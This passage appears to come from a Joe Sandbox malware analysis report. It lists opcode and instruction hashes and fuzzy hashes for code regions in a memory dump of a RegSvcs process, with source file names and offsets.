• Opcode ID: 2938901de9fdbd73d04e785010cbc68d5904818da704fe0ee4aa9c3b780835e9
• Instruction ID: ad37adda921371d86f28a82da479f0c01fe1cbed8606259dc8aa25eff517963e
• Opcode Fuzzy Hash: 2938901de9fdbd73d04e785010cbc68d5904818da704fe0ee4aa9c3b780835e9
• Instruction Fuzzy Hash: BF410370E012488BEB58DFAAD9506EDFBF2AF89300F24D13AD418AB259DB345946CF54
Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04b1b1ba95da7ac6936f05b7a0270a0638b8ed8aac2da8d6b974e61f59a38813
• Instruction ID: 0b6d0c2fe323a056ab9200bb25df51558970531e24f29a0e6f6d76b0e5ee04c0
• Opcode Fuzzy Hash: 04b1b1ba95da7ac6936f05b7a0270a0638b8ed8aac2da8d6b974e61f59a38813
• Instruction Fuzzy Hash: 7941F370E012488FEB58CFBAC9406EDFBF2AF89300F24D569D418AB258DB344946CF54
Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a424bb9a5629721e8e0d906951240185402c1c27962983010290edd1d11fbf86
• Instruction ID: 933e28bee3078ea48d10c39b825ba67de2a58aff4fd4eaaad6bb09267ac0d196
• Opcode Fuzzy Hash: a424bb9a5629721e8e0d906951240185402c1c27962983010290edd1d11fbf86
• Instruction Fuzzy Hash: 09410170E012488FEB58DFAAD9406EDFBF2AF89300F24942AD415AB258DB344A46CF44
Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1e98f812ebabc7a24bcef65b2629c9ba96c117234bb09588495c3a64cbb1b5c2
• Instruction ID: 64f7e3756a02db8cd8f2bce014345722e340b1c50e59494fc180e07e49ac0635
• Opcode Fuzzy Hash: 1e98f812ebabc7a24bcef65b2629c9ba96c117234bb09588495c3a64cbb1b5c2
• Instruction Fuzzy Hash: 9B41E170E012488BEB58DFBAD9406EDBBF2AF89300F20D12AC419BB258DB345946CF54